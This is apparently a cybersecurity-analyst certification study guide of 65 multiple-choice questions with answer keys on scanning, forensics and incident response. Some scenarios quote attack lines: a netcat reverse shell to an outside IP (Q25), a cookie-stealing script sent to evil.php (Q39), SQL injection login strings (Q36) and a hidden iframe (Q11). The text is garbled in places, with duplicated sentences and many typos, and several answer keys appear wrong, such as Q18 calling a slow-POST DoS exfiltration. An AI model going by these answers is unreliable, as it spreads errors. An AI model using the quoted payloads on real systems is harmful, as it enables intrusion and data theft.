Study Guide

Question 1

Which of the following command line utilities would an analyst use on an end-user PC to determine the parts it is listening on? A tracert B ping C nslookup D netstat

Answer 1

netstat

Question 2

An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee’s normal job function. Human resources has asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement? A Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media. B Degauss the hard drive and then copy to a hard drive of at least equivalent size using ITFS formatting. C Log onto the computer with administrator privileges, and copy the hard drive to an external storage device. D Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.

Answer 2

A Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media

Question 3

Which of the following is a vulnerability when using window as a host OS for virtual machines? A Window requires frequent patching. B Windows virtualized environments are typically unstable. C Windows requires hundreds of open firewall ports to operate. D Windows is vulnerable to the “ping of death”.

Answer 3

A Window requires frequent patching.

Question 4

A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company’s network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process? A Wipe hard drives, reimage the system, and return the affected systems to ready state. B Direct and analyze he precursors and indicators; schedule a lessons learned meeting. C Remove the malware and inappropriate materials; eradicate the incident. D Perform event correlation; create a log retention policy.

Answer 4

A Wipe hard drives, reimage the system, and return the affected systems to ready state.

Question 5

The security team has determined that the current incident response resources cannot meet management’s objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensation controls can be used to help meet management’s expectations? A Separation of duties B Scheduled reviews C Dual control D Outsourcing

Answer 5

D Outsourcing

Question 6

An organization has had problems with security teams remediating vulnerabilities that are either false positives or are not applicable to the organization’s server. Management has put emphasis on security teams conducting details analysis and investigation before conducting any remediation. The output from a recent Apache web server scan is shown below:s —- Scan Host: 192.168.1.18 15-Jan-16 10:12:10.1 PDT Vulnerability CVE-2006-5752 Cross-site scripting (XSS) vulnerability in the mod_status module of Apache server (httpd), when ExtendedStatus is enabled and a public-server-status page is used, allows remote attackers to inject arbitrary web script or HTML. Severity: 4.3 (medium) — The team performs some investigation and finds the statement from Apache on 07/02/2008. “Fixed in Apache HTTP server 2.2.6, 2.0.61, and 1.3.39” Which of the following conditions would require the team to perform remediation on this finding? A The organization is running version 2.2.6 and has ExtendedStatus enabled. B The organization is running version 2.0.59 and is not using a public-server-status page. C The organization is running version 1.3.39 and is using a public-sever-status page. D The organization is running version 2.0.5 and has ExtendedStatus enabled.

Answer 6

D The organization is running version 2.0.5 and has ExtendedStatus enabled.

Question 7

A new security manager was hired to establish a vulnerability management program. The manager asked for a corporate strategic plan and risk register that the project management office developed. The manager conducted a tools and skill sets inventory to document the plan. Which of the following is a critical task for the establishment of a successful program? A Establish continuous monitoring B Update vulnerability feed C Perform information classification D Establish corporate policy

Answer 7

B Update vulnerability feed

Question 8

Which of the following tools should an analyst use to scan for web server vulnerabilities? A Wireshark B Qualys C ArcSight D SolarWinds

Answer 8

B Qualys

Question 9

An analyst preparing for a technical security compliance check on all Apache server. Which of the following will be the BEST to use? A CIS benchmark B Nagios C Untidy D Chain & Abel

Answer 9

A CIS benchmark

Question 10

A technician is troubleshooting a desktop computer with low disk space. The technician reviews the following information snippets: Disk Allocation Report 350GB - C:\user1\movies\movies Network Stats Proto Local Address Foreign Address State TCP 0.0.0.0:8080 0.0.0.0 LISTENING movieDB TCP 192.168.1.10:8080 172.16.34.77:1200 TIME_WAIT Which of the following should the technician do the BEST resolve the issue based on the above information? (Select TWO) A Delete the movie\movies directory. B Disable the movieDB service. C Enable OS auto updates. D Install a file integrity tool. E Defragment the disk.

Answer 10

A Delete the movie\movies directory. B Disable the movieDB service.

Question 11

A cybersecurity analyst was asked to review of web vulnerability scan logs. Given the following snippet of code: Iframe src=”http://65.240.22.1” width=”0” height=”0” franeborder=”0” tabindex=”-1” title=”empty” style=visibility:hidden;display:none /iframe Which of the following BEST describes the situation and recommendations to be made? A The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name. B The security analyst has discovered an embedded iframe that is hidden from users accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present. C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page. D The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

Answer 11

C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.

Question 12

A cybersecurity analyst is currently auditing a new Active Directory server for compliance. The analyst uses Nessus to do the initial scan, and Nessus reports the following: PluginID IP Port 10955 192.168.1.215 Microsoft-ds (445/tcp) 11210 192.168.1.215 Microsoft-ds (445/tcp) 12350 192.168.1.215 Netbus (35/udp) 12345 192.168.1.215 Ftp (21/tcp) Which of the following critical vulnerabilities has the analyst discovered? A Known backdoor B Zero-day C Path disclosure D User enumeration

Answer 12

A Known backdoor

Question 13

Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Select THREE). A Multifactor authentication B Network segmentation C Single sign-on D Encryption E Complexity policy F Biometrics G Obfuscation

Answer 13

A Multifactor authentication B Network segmentation E Complexity policy

Question 14

A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and file system have been hardened. However, the cybersecurity analyst discover that data from the database can be mined from over the internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database? A Configure the database to listen for incoming connections on the internet network. B Change the database connection string and apply necessary patches. C Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443. D Deploy a web application firewall to protect the web application from attacks to the database.

Answer 14

C Configure an ACL in the border firewall to block all connections to the web server

Question 15

A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Select TWO). A Validate the folder and file directory listings on both. B Check the hash value between the image and the original. C Boot up the image and the original system to compare. D Connect a write blocker to the imaging device. E Copy the data to a disk of the same size and manufacturer

Answer 15

B Check the hash value between the image and the original. D Connect a write blocker to the imaging device.

Question 16

A company’s IDP/DLP solution triggered the following alerts: A. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234 B 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25 C. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53 D. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445 E. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21 Which of the following alerts should a security analyst investigate FIRST? A A B B C C D D E E

Answer 16

B

Question 17

A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior? A Phishing B Whaling C Spam D Ransomware

Answer 17

B Whaling

Question 18

A security analyst is conducting traffic analysis and observes an HTTP POST to the company’s main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of? A Exfiltration B DoS C Buffer overflow D SQL injection

Answer 18

A Exfiltration

Question 19

A security analyst want to confirm a finding from a penetration test report on the internal web server. To do so, the analyst logs into the web server using SSH to send the request locally. The report provides a link to https://hrserver.internal/../etc/paswd. And the server IP address is 10.10.10.15 However, after several attempts, the analyst cannot get the file, despite attempting to get it using different ways, as shown below: Request Response https://hrserver.internal/../…/etc/paswd Host not found https://localhost/../…/etc/passwd File not found https://10.10.10.15/../…/etc/passwd File not found Which of the following would explain this problem? (Select TWO) A The web server uses SNI to check for a domain name. B Request can only be sent remotely to the web server C There is no local name resolution for hrserver internal D The password file is write protected E The web server has not started

Answer 19

A The web server uses SNI to check for a domain name. C There is no local name resolution for hrserver internal

Question 20

A SIEM alert occurs with the following output: Mac IP Duration Logged on 01:23:45:33:89:cc 192.168.122.3 15 h gours Yes 01:23:45:33:89:cc 192.168.122.9 4 days Yes Which of the following BEST describe this alert? A The alert is a positive, there is a device with dual NICs. B The alert is valid because IP spoofing may be occurring on the network. C The alert is a false positive, both NICs are of the same brand. D The alert is valid because there may be rogue device on the network

Answer 20

D The alert is valid because there may be rogue device on the network

Question 21

A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem? A The access point is blocking access by MAC address. Disable MAC address filtering. B The network is not available. Escalate the issue to network support. C Expired DNS entries exist on users devices. Request the affected users perform a DNS flush. D The access point is a rogue device. Follow incident response procedures.

Answer 21

D The access point is a rogue device. Follow incident response procedures.

Question 22

An application contains the following log entries in a file named “authlog.log”. User ‘oidc-provider-fb:john’ successfully logged in 2016-01-01 23:00:01 User ‘local:Administrator’ successfully logged out 2016-01-01 23:00:05 User ‘oidc-provider-fb:kate’ successfully logged out 2016-01-01 23:00:07 A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task? A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task? A grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g B cat authlog.log | grep “2016-01-01” | echo “valid username found: $2” C echo authlog.log > sed ‘s/User//’ | print “username exists: $user” D cat “authlog.log” | grep “User” | cut -F’ ‘ | “username exists: $1”

Answer 22

A grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g

Question 23

An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process? A Create a third environment between development and production that mirrors production and tests all changes before deployment to the user. B Refine testing in the development environment to include fuzzing and user acceptance testing so application are more stable before they migrate to production. C Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate user to the alternate production environment. D Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities.

Answer 23

A Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.

Question 24

When reviewing the system log, the cybersecurity analyst noticed a suspicious log entry. Wmic /node:HRDepartment1 computersystem get username Which of the following combinations describes what occurred, and what action should be taken in this situation? A A rogue user has queried for users logged in remotely. Disable local access to network shares. B A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command. C A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt. D A rogue user has queried for user logged in remotely. Attempt to determine who executed the command.

Answer 24

D A rogue user has queried for user logged in remotely. Attempt to determine who executed the command.

Question 25

A security analyst is investigating the possible compromise of a production server for the company’s public-facing portal. The analyst runs a vulnerability scan againest the server and receives the following output: + Server: nginx/1.4.6 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The x-xss-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGT Directories found (use ‘-c all’ to force check all the possible dirs) + Entry ‘/wp-admin/’ in robots.txt returned a non-forbidden or redirect HTTP code (302) + “Robots.txt” contains two entries that should be manually viewed. In some of the portal’s startup command files, the following command appears: Nc -e /bin/sh 72.14.1.36 4444 Investigating further, the analyst runs Netstat and obtains the following output: # netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:443 *:* LISTEN tcp 0 52 *:59482 72.14.1.36:4444 ESTABLISHED tcp 0 0 *:80 *:* LISTEN Which of the following is the best step for the analyst to take NEXT? A Initiate the security incident response process. B Recommend training to avoid mistakes in production command files. C Delete the unknown files from the production servers. D Patch a new vulnerability that has been discovered E Manually review the robots.txt file for error

Answer 25

A Initiate the security incident response process.

Question 26

A cybersecurity analyst wants to use a tool that prevents vulnerabilities in software from being successfully exploited. Which of the following tools can be implemented to achieve this goal? A HIPS B EMET C Helix D Nessus

Answer 26

A HIPS

Question 27

Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record? A ifconfig B ping C arp D nbtstat

Answer 27

B ping

Question 28

Which of the following describes why it is important for an organization’s incident response team and legal department to meet and discuss communication processes during the incident response process? A To comply with existing organization policies and procedures on interacting with internal and external parties. B To insure all parties know their roles and effective lines of communication are established C To identify which group will communicate details to law enforcement in the event of a security incident D To predetermine what details should or should not be shared with internal or external parties in the event of an incident

Answer 28

B To insure all parties know their roles and effective lines of communication are established

Question 29

During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team. Which of the following information should be shown to the officer? A Letter of engagement B Scope of work C Timing information D Team reporting

Answer 29

B Scope of work

Question 30

A security administrator recently deployed a virtual honeynet. The honeynet is not protected by the company’s firewall, while all production network are protected by a stateful firewall. Which of the following would BEST allow an external penetration tester to determine which on is the honeynet’s network? A Banner grab B Packet analyzer C Fuzzer D TCP ACK scan

Answer 30

D TCP ACK scan

Question 31

A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included. Source Destination Application Packets Volume (kbps) 8.4.4.100 172.16.1.25 SMTP 4386 6141 96.23.114.14 172.16.1.1 ITSec 7734 10827 172.16.1.101 100.15.25.34 HTTP 3412 4776 96.23.114.18 172.16.1.1 IPSec 2723 3812 172-16.1.101 100.15.25.34 SSL 8697 12176 172.16.1.222 203.67.121.12 Quicktime 1302 1822 172.16.1.197 113.121.12.15 8180/tcp 6045 8463 172.16.1.131 172.16.1.67 DHCP 25 35 172.16.1.25 172.16.1.53 DNS 66 93 Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues? A Perform reverse lookup on each of the IP addresses listed to help determine if the traffic is necessary. B Recommend that networking block the unneeded protocols such as Quicktime to clear up some of the congestion. C Put ACLs in place to restrict traffic destined for random or non-default application ports. D Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.

Answer 31

C Put ACLs in place to restrict traffic destined for random or non-default application ports.

Question 32

During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in form multiple external locations, including several overseas. Further review of the account showed access right to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk? A RADIUS identity management B Context-based authentication C Privilege escalation restrictions D Elimination of self-service password resets

Answer 32

B Context-based authentication

Question 33

On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability? A. VDI systems B. Mobile devices C. Enterprise server Oss D. VPNs E. VoIP phones

Answer 33

B. Mobile devices

Question 34

A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation? A Fuzzing B Input validation C Change control D Sandboxing

Answer 34

C Change control

Question 35

The SOC shift supervisor is looking through the administrator access logs for the key network devices. The supervisor notices there are no administrative access entries for the previous day, but knows IOS upgrades were scheduled on key network devices, according to the change control board notifications form the last shift logs. Which of the following is the MOST likely cause? A Someone cleared the log files to cover malicious activity. B Updates and upgrades were pushed out to a later date. C SNMP community string were changed in the upgrade process. D There were issues aggregating the individual log files into the administrator access logs.

Answer 35

A Someone cleared the log files to cover malicious activity.

Question 36

A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to further test to verify that the vulnerability found exits. The analyst uses the following snippet of code: Username: admin ‘ ; – Password : ‘ OR 1=1 – Which of the following vulnerabilities is the analyst checking for? A Buffer overflow B SQL injection C Default password D Format string attack

Answer 36

B SQL injection

Question 37

The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management’s intent to set this control level. Which of the following is the appropriate means to achieve this? A A control B A standard C A policy D A guideline

Answer 37

C - A policy

Question 38

An analyst suspects large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST. A Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated. B Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data. C Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted. D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

Answer 38

D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

Question 39

Given the following code: var adr =”../evil.php?breadomonster=’ +escape{document.cookie}; var query = “SELECT * FROM users WHERE name=’smith’; Which of the following types of attacks is occurring? A Privilege escalation B XSS C Session hijacking D MITM E SQL injection

Answer 39

B XSS

Question 40

Which of the following should be used to correlate multiple events from different regions, time zones, and time periods? A Snort B Arcsight C Imperva D Nessus

Answer 40

B Arcsight

Question 41

A security analyst is running a penetration test against a client’s external firewall. The analyst runs an attack that attempts to flood the firewall from multiple locations while denying access to others. Which of the following attacks did the analyst perform? A Fuzzing B DDoS C Ping of death D MITM

Answer 41

B DDoS

Question 42

A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usasy, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this? A Advanced persistent threat B Zero day C Trojan D Logic bomb

Answer 42

B Zero day

Question 43

A technician receives an alert indicating an endpoint us beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used to BEST protect the network in response to this alert? (Select TWO) A Set up a sinkhole for that dynamic DNS domain to prevent communication. B Isolate the infected endpoint to prevent the potential spread of malicious activity. C Implement an internal honeypot to catch the malicious traffic and trace it. D Perform a risk assessment and implement compensating controls. E Ensure the IDS is active on the network segment where the endpoint resides.

Answer 43

A Set up a sinkhole for that dynamic DNS domain to prevent communication. B Isolate the infected endpoint to prevent the potential spread of malicious activity.

Question 44

After a review of user account activity, it appears certain user accounts were being used to access critical systems that are unrelated to the users roles and responsibilities. The user accounts in question were disabled, but then other user accounts were used to perform the same activity soon after. Which of the following is the BEST remediation to stop this violation? A Reconfigure Radius. B Implement MFA. C Upgrade to the latest TLS. D Salt password hashes.

Answer 44

B Implement MFA.

Question 45

A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator is able to ping every device on the network and confirms that the network is very slow. Administrator’s PC: 192.168.1.20 User’s PC: 192.168.1.22 AP-Finance: 192.168.1.10 AP-Workshop: 192.168.1.11 AP-Lounge: 192.168.1.12 AP-Reception: 192.168.1.13 AP-Warehouse: 192.168.1.14 AP-IT: 192.168.1.15 Output Interface: 192.168.1.20 — 0xf Internet Address Physical Address Type 192.168.1.4 1a-25-0d-df-c6-27 dynamic 192.168.1.5. 1a-25-0d-df-c8-00 dynamic 192.168.1.10 00-dc-3b-67-81-1a dynamic 192.168.1.11 c4-02-03-a1-4a-01 dynamic 192.168.1.12 00-dc-3b-67-82-02 dynamic 192.168.1.13 00-dc-3b-a5-ba-0b dynamic 192.168.1.14 00-dc-3b-67-88-07 dynamic 192.168.1.15 00-dc-3b-67-80-0a dynamic 192.168.1.20 1a-25-0d-df-8d-82 dynamic 192.168.1.22 1a-25-0d-df-89-cb dynamic Given the above result, which of the following should the administrator investigate FIRST? A The AP-Workshop device B The AP-Reception device C The device at 192.168.1.4 D The AP-IT device389 E The user’s PC

Answer 45

A The AP-Workshop device

Question 46

A security analyst’s daily review of system logs and SIEM showed fluctuating patterns of latency. During the analysis, the analyst discovered recent attempts of intrusion related to malware that overwrite the MBR. The facilities manager informed the analyst that a nearby construction project damaged the primary power lines, impacting the analyst’s support systems. The electric company has temporarily restored power, but the area may experience temporary outages. Which of the following issues should the analyst focus on to continue operations? A Updating the ACL B Conducting backups C Virus scanning D Additional log analysis

Answer 46

B Conducting backups

Question 47

In comparison to non-industrial IT vendors, ICS equipment vendors generally. A Rely less on proprietary code in their hardware products. B Have more mature software development models. C Release software updates less frequently. D Provide more extensive vulnerability reporting.

Answer 47

C Release software updates less frequently.

Question 48

During routine network reconnaissance that is looking for unused but open ports, a company’s scans generate the following packet captures: 132 17.816492 192.168.1.132 192.168.1.1 TCP 58 49151 -> 22 [SYN] Seq=0 win=1024 Len=0 MSS=1460 133 17.816942 192.168.1.132 192.168.1.1 TCP 58 49151 -> 445 [SYN] Seq=0 win=1024 Len=0 MSS=1460 134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 19151 [SYN, ACK] Seq=0 Ack=1 win=5840 Len=0 MSS=1460 134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 49151 [SYN, ACK] Seq=0 Ack=1 win=5840 Len=0 MSS=1460 135 17.819546 192.168.1.132 192.168.1.1 TCP 58 49151 -> 80 [SYN] Seq=0 win=1024 Len=0 MSS=1460 136 17.824887 192.168.1.1 192.168.1.132 TCP 54 445 -> 49151 [RST, ACK] Seq=1 Ack=1 win=0 Len=0 137 17.829763 192.168.1.1 192.168.1.132 TCP 54 80-> 49151 [RST, ACK] Seq=1 Ack=1 Win=0 =Len=0 138 22.063352 192.168.1.1 192.168.1.132 TCP 58 [TCP Retransmission] 22 -> 49151 [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460 Which of the following is the BEST reason for the retransmission is packet 138? A Port 22 is closed, and 192.168.1.1 is attempting to complete the closure. B Port 22 is open, and 192.168.1.132 is attempting to continue the handshake. C port 22 is closed, and 192.168.1.132 is attempting to complete the closure. D Port 22 is open, and 192.168.1.1 is attempting to continue the handshake.

Answer 48

B Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.

Question 49

An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here: Starting Nmap 4.67 (http://map.org) at 2011-11-03 18:32 EDT Nmap scan report for 192.168.1.13 Host is up (0.00066s latency). />Not shown: 992 closed ports PORT STATESERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 3306 open mysql MAC Address:01:AA:FB:23:21:45 Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds Given the organization’s policy , which is the following services should be disabled on this server? A rpcbind B netbios-ssn C mysql D ssh E talent

Answer 49

D ssh

Question 50

A system’s authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthorization activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below. ——- Scan Host: 192.168.1.13 15-Jan-16 08:12:10.1 EDT Vulnerability CVE-2015-1635 HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows Server 2012 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka “HTTP.sys remote code execution vulnerability” Severity: 10.0 (high) Expected Result: enforceHTTPValidation=’enabled’; Current Value: enforceHTTPValidatoin=enabled; Evidence: C:\8system8\windows\config\web.config ——— s A Remediate by going to the web.config file, searching for the enforce HTTP validation setting, and manually updating to the correct. B Accept this risk for now because this is a “high” severity, but testing will require more than the four days available, and the system ATO needs to be completed. C Ignore it. This is a false positive, and the organization needs to focus its efforts on other findings. D Ensure HTTP validation is enabled by rebooting the server.

Answer 50

A Remediate by going to the web.config file, searching for the enforce HTTP validation

Question 51

A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the web server. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used? A APT B Zero-day attack C Man-in-the-middle attack D XSS

Answer 51

A APT

Question 52

A security analyst has been asked to scan a subnet. During the scan, the following output was generated.sho [root@scanbox-]# nmap 192.168.100.* Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2015-10-10 19:10 EST Interesting ports on ports on purple.company.net (192.168.100.145): Not shown:1677 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 111/tcp open rpcbind Interesting ports on lemonyellow.company.net (192.168.100.214) Not shown: 1676 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 443/tcp open ssl/http Nmap finished : 256 IP addresses (2 hots up) scanned in 7.223 seconds Based on the output above, which of the following is MOST likely? A 192.168.100.214 is a secure FTP server. B 192.168.100.214 is a web server. C Both hosts are mail servers. D 192.168.100.145 is a DNS server.

Answer 52

B 192.168.100.214 is a web server.

Question 53

A security analyst’s company uses RADIUS to support a remote sales staff of more than 700 people. The Chief Information Security Officer (CISO) asked to have IPSec using ESP and 3DES enabled to ensure the confidentiality of the communication as per RFC 3162. After the implementation was complete, many sales users reported latency issues and other performance issues when attempting to connect remotely. Which of the following is occurring? A The device running RADIUS lacks sufficient RAM and processing power to handle ESP implementation. B RFC 3162 is known to cause significant performance problems. C The IPSec implementation has significantly increased the amount of bandwidth needed. D The implementation should have used AES instead of 3DES.

Answer 53

A The device running RADIUS lacks sufficient RAM and processing power to handle ESP implementation.

Question 54

A company uses a managed IDS system, and a security analyst has noticed a large volume of brute force password attacks originating from a single IP address. The analyst put in a ticket with the IDS provider, but no action was taken for 24 hours, and the attacks continued. Which of the following would be the BEST approach for the scenario described? A Draft a new MOU to include response incentive fees. B Reengineer the BPA to meet the organization’s needs. C Modify the SLA to support organizational requirements. D Implement on MOA to improve vendor responsiveness.

Answer 54

A Draft a new MOU to include response incentive fees.

Question 55

The help desk has reported that users are reusing previous passwords when prompted to change them. Which of the following would be the MOST appropriate control for the security analyst to configure to prevent password reuse? (Select TWO) A Implement mandatory access control on all workstations. B Implement role-based access control within directory services. C Deploy Group Policy Objects to domain resources. D Implement scripts to automate the configuration of PAM of Linux hosts. E Deploy a single sign-on solution for both Windows and Linux hosts.

Answer 55

B Implement role-based access control within directory services. C Deploy Group Policy Objects to domain resources.

Question 56

A company has a popular shopping cart website hosted in several geographically diverse locations. The company has started hosting static content on a content delivery network (CDN) to improve performance. The CDN provider has reported the company is occasionally sending attack traffic to other CDN-hosted targets. Which of the following has MOST likely occurred? A The CDN provider has mistakenly performed a GeoIP mapping to the company. B The CDN provider has misclassified the network traffic as hostile. C A vulnerability scan has not been tuned to exclude web assets hosted by the CDN. D The company has been breached, and customer Pll is being exfiltrated to the CDN.

Answer 56

C A vulnerability scan has not been tuned to exclude web assets hosted by the CDN.

Question 57

A vulnerability scan come back with critical findings for a Microsoft SharePoint server. Vulnerable software installed: office 2007 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrectVersion\Installer\UserData\s-1-5 -18\Products\000021096F0100000100000000F01FEC\InstallProperties - keyexistsThe office component Microsoft Office Excel Services Web Front End Components is running an affected version - 12.0.6612.1000 Which of the following actions should be taken? A Remove Microsoft office from the server. B Document the finding as an exception. C Install a newer version of Microsoft Office on the server. D Patch Microsoft Office on the server.

Answer 57

C Install a newer version of Microsoft Office on the server.

Question 58

A vulnerability scan report shows a vulnerable version of Apache on a Linux server. The analyst validates the version by retrieving the server’s banner. The server’s administrator verifies that all available updates have been installed, but an attempt to exploit the vulnerability fails. Which of the following MOST likely occurred? A The vulnerability scanner is unable to properly establish a connection to the server. B The scanner agent was improperly installed. C The Apache server was patched before the scan was completed. D The package manager includes backported versions of Apache.

Answer 58

D The package manager includes backported versions of Apache.

Question 59

Which of the following organizations would have to remediate embedded controller vulnerabilities? A Banking institutions B Public universities C Regulatory agencies D Hydroelectric facilities

Answer 59

D Hydroelectric facilities

Question 60

Which of the following is a security concern found PRIMARILY in virtual infrastructure? A Two-factor authentication for network resources B Physical hardware supporting multitenancy C Airgapped system that will not run on the hypervisor D User access to outside resources

Answer 60

B Physical hardware supporting multitenancy

Question 61

A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented? A System isolation B Honeypot C Jump box D Mandatory access control

Answer 61

C Jump box

Question 62

Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate? A ICS/SCADA systems are not supported by the CVE publications. B ICS/SCADA system rarely have full security functionality. C ICS/SCADA systems do not allow remote connections. D ICS/SCADA systems use encrypted traffic to communicate between devices.

Answer 62

B ICS/SCADA system rarely have full security functionality.

Question 63

A security engineer has been asked to reduce the attack surface on an organization’s production environment. To limit access, direct VPN access to all system must be terminated , and users must utilize multi factor authentication to access a constrained VPN connection and then pivot to other production systems from a bastion host. The MOST appropriate way to implement the stand requirement is through the use of a: A sinkhole. B multitenant platform. C single-tenant platform. D jump box.

Answer 63

D jump box.

Question 64

In the development stage of the incident response policy, the security analyst needs to determine the stakeholders for the policy. Which of the following would be the policy stakeholders? A Human resources, legal, public relations, management B Chief Information Officer (CIO), Chief Executive Officer (CEO), board of directors, stockholders C IT, human resources, security administrator, finance D Public information officer, human resources, audit, customer service

Answer 64

B Chief Information Officer (CIO), Chief Executive Officer (CEO), board of directors, stockholders

Question 65

After reviewing security logs, it is noticed that sensitive data is being transferred over an insecure network. Which of the following would a cybersecurity analyst BEST recommend that the organization implement? A Use a VPN. B Update the data classification matrix. C Segment the networks. D Use a FIM. E Use a digital watermark.

Answer 65

A Use a VPN.

Question 66

